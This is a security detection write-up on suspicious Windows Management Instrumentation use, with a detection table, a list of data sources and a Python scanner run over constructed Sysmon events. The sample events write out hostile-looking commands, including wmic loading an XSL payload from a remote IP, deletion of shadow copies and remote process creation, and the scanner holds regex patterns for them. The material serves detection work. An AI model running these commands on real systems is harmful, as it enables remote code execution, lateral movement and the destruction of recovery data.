Analytic Story: Suspicious WMI Use

Description

Attackers are increasingly abusing Windows Management Instrumentation (WMI), a framework and associated utilities available on all modern Windows operating systems. Because WMI can be leveraged to manage both local and remote systems, it is important to identify the processes executed and the user context within which the activity occurred.

Why it matters

WMI is Microsoft's infrastructure for management data and operations on Windows operating systems. It includes a set of utilities that can be used to manage both local and remote Windows systems. Attackers increasingly abuse WMI for reconnaissance, detection of antivirus products and virtual machines, code execution, lateral movement, persistence, and data exfiltration. The detection searches in this Analytic Story look for suspicious use of WMI, primarily WMI being used to start processes on remote systems; the story also covers WMI event subscription persistence, XSL script processing through wmic, and shadow copy deletion via wmic. When unauthorized WMI execution is found, analysts and investigators should establish the context of the event: which process ran, under which user account, on which host, and from where. These details show how WMI was used and to what end.
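The following is an added illustration, not part of the original story and not Splunk's own search logic: a small Python detection pass over constructed Sysmon EventID 1-style process-creation records that applies the same kinds of checks the searches above describe (wmic starting a process on a remote node, a process spawned by the WMI provider host WmiPrvSE.exe, wmic loading an XSL stylesheet from a URL, and wmic deleting shadow copies) while keeping the host and user context an investigator needs. The hosts, users, IP address, command lines and rule names are assumptions made for the example.

```python
"""Added example: a detection pass over constructed Sysmon EventID 1-style
process-creation records, mirroring the WMI behaviours this story's searches
look for. All events, hosts, users and command lines are constructed sample
data, not real telemetry."""
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample events. Field names follow Sysmon EventID 1 (Image,
# ParentImage, CommandLine, User, Computer); the values are made up.
SAMPLE_EVENTS = [
    # 1. Operator on ws01 uses wmic to start a process on fs02 (remote process call create).
    {"Computer": "ws01", "User": "CORP\\alice",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'wmic /node:"fs02" process call create "cmd.exe /c whoami > c:\temp\o.txt"'},
    # 2. The same action as seen on the target fs02: the WMI provider host spawns the child.
    {"Computer": "fs02", "User": "CORP\\alice",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /c whoami > c:\temp\o.txt"},
    # 3. wmic pulling an XSL stylesheet over HTTP (XSL script processing).
    {"Computer": "ws01", "User": "CORP\\bob",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'wmic os get /format:"http://198.51.100.7/payload.xsl"'},
    # 4. Shadow copy deletion via wmic (inhibit system recovery).
    {"Computer": "ws01", "User": "NT AUTHORITY\\SYSTEM",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wmic shadowcopy delete /nointeractive"},
    # 5. Benign local inventory query: wmic, but none of the flagged behaviours.
    {"Computer": "ws01", "User": "CORP\\carol",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wmic os get caption,version"},
    # 6. Unrelated process start.
    {"Computer": "ws01", "User": "CORP\\dave",
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]


@dataclass(frozen=True)
class Finding:
    rule: str
    computer: str
    user: str
    command_line: str


# Match on the image file name rather than a substring of the command line, so
# an unrelated binary that merely has "wmic" in its arguments is not caught here.
_WMIC_IMAGE = re.compile(r"(?:^|\\)wmic\.exe$", re.IGNORECASE)
_WMIPRVSE_IMAGE = re.compile(r"(?:^|\\)wmiprvse\.exe$", re.IGNORECASE)
_PROCESS_CALL_CREATE = re.compile(r"process\s+call\s+create", re.IGNORECASE)
_REMOTE_NODE = re.compile(r"/node:", re.IGNORECASE)
_XSL_URL = re.compile(r'/format:\s*"?https?://', re.IGNORECASE)
_SHADOWCOPY_DELETE = re.compile(r"shadowcopy\s+delete", re.IGNORECASE)


def check_event(ev):
    """Return the list of rule names a single process-creation event trips."""
    image = ev.get("Image", "")
    parent = ev.get("ParentImage", "")
    cmd = ev.get("CommandLine", "")
    rules = []
    if _WMIC_IMAGE.search(image):
        if _PROCESS_CALL_CREATE.search(cmd):
            # /node: means the process is being created on another host.
            rules.append("remote_process_call_create" if _REMOTE_NODE.search(cmd)
                         else "local_process_call_create")
        if _XSL_URL.search(cmd):
            rules.append("xsl_via_url")
        if _SHADOWCOPY_DELETE.search(cmd):
            rules.append("shadowcopy_delete")
    if _WMIPRVSE_IMAGE.search(parent):
        # On the target side, anything WmiPrvSE.exe spawns was started through WMI.
        rules.append("wmiprvse_child")
    return rules


def scan(events):
    """Run every rule over every event, keeping host and user context for triage."""
    return [Finding(rule, ev.get("Computer", ""), ev.get("User", ""), ev.get("CommandLine", ""))
            for ev in events for rule in check_event(ev)]


def summarize_by_user(findings):
    """Count findings per user so analysts can see who drove the WMI activity."""
    return dict(Counter(f.user for f in findings))


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:28} host={f.computer:5} user={f.user:20} cmd={f.command_line}")
```

Events 1 and 2 are the two halves of one remote execution: the source host shows wmic with /node:, the target host shows WmiPrvSE.exe as the parent of the spawned process, and correlating the two on the same user within a short window is what turns a hunting lead into a confirmed lateral-movement event. The same logic applies to Windows Security 4688 records with NewProcessName, ParentProcessName (Creator Process Name) and SubjectUserName in place of the Sysmon field names.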

Detections

Name | Technique | Type
WMIC XSL Execution via URL | XSL Script Processing | TTP
XSL Script Execution With WMIC | XSL Script Processing | TTP
Script Execution via WMI | Windows Management Instrumentation | TTP
PowerShell Invoke WmiExec Usage | Windows Management Instrumentation | TTP
Windows WMIC Shadowcopy Delete | Inhibit System Recovery | Anomaly
Remote Process Instantiation via WMI | Windows Management Instrumentation | TTP
WMI Temporary Event Subscription | Windows Management Instrumentation | TTP
Windows WMI Process Call Create | Windows Management Instrumentation | Hunting
Detect WMI Event Subscription Persistence | Windows Management Instrumentation Event Subscription | TTP
Process Execution via WMI | Windows Management Instrumentation | TTP
WMI Permanent Event Subscription - Sysmon | Windows Management Instrumentation Event Subscription | TTP
Remote WMI Command Attempt | Windows Management Instrumentation | TTP
WMI Permanent Event Subscription | Windows Management Instrumentation | TTP

Data Sources

Name | Platform | Sourcetype | Source
CrowdStrike ProcessRollup2 | Other | crowdstrike:events:sensor | crowdstrike
Sysmon EventID 1 | Windows | XmlWinEventLog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Windows Event Log Security 4688 | Windows | XmlWinEventLog | XmlWinEventLog:Security
Cisco Network Visibility Module Flow Data | Network | cisco:nvm:flowdata | not_applicable
Powershell Script Block Logging 4104 | Windows | XmlWinEventLog | XmlWinEventLog:Microsoft-Windows-PowerShell/Operational
Sysmon EventID 20 | Windows | XmlWinEventLog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 21 | Windows | XmlWinEventLog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational

Source: GitHub | Version: 3